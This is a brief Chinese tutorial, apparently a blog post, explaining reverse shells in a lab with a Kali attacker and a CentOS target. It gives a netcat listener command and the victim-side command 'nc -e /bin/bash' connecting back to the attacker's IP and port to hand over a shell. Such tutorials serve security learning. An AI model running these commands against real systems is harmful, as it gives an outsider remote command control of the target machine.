反弹shell

目录

前言

反弹shell

攻击机监听本机端口

被攻击机发起连接

攻击机操作


前言

反弹shell是一种网络技术,主要用于在攻击者和被攻击者之间建立命令行的输入输出控制通道。与常规的远程连接方式不同,反弹shell是由被攻击者主动向外连接攻击者,而不是由攻击者连接到被攻击者。

反弹shell通常用于被控端受到防火墙限制、无法接受外部连接、或者IP地址动态变化等情况。这种技术确保即使被控设备位于内部网络中,或者由于某些安全限制无法被直接访问时,攻击者依然能够实现远程控制。


反弹shell

攻击机kali ip 192.168.100.222

被攻击机centos ip 192.168.100.130

攻击机监听本机端口

nc -lvp 空闲端口

nc -lvp 4444


被攻击机发起连接

nc -e /bin/bash 攻击机ip 攻击机监听端口

nc -e /bin/bash 192.168.100.222 4444

如果没有报错或者退出当前命令行,说明连接建立成功


攻击机操作

回到攻击机:

结果显示连接成功

这是就可以进行进一步命令操作了:



相关推荐
newxtc几秒前
【支付行业-支付系统架构及总结】
安全·支付宝·第三方支付·风控系统·财付通
EricWang13588 分钟前
[OS] 项目三-2-proc.c: exit(int status)
服务器·c语言·前端
newxtc31 分钟前
【旷视科技-注册/登录安全分析报告】
人工智能·科技·安全·ddddocr
成都古河云32 分钟前
智慧场馆:安全、节能与智能化管理的未来
大数据·运维·人工智能·安全·智慧城市
Gworg33 分钟前
您与此网站之间建立的连接不安全解决方法
安全
算法与编程之美35 分钟前
文件的写入与读取
linux·运维·服务器
长弓三石1 小时前
鸿蒙网络编程系列44-仓颉版HttpRequest上传文件示例
前端·网络·华为·harmonyos·鸿蒙
xianwu5431 小时前
反向代理模块
linux·开发语言·网络·git
follycat1 小时前
[极客大挑战 2019]HTTP 1
网络·网络协议·http·网络安全
ac-er88882 小时前
MySQL如何实现PHP输入安全
mysql·安全·php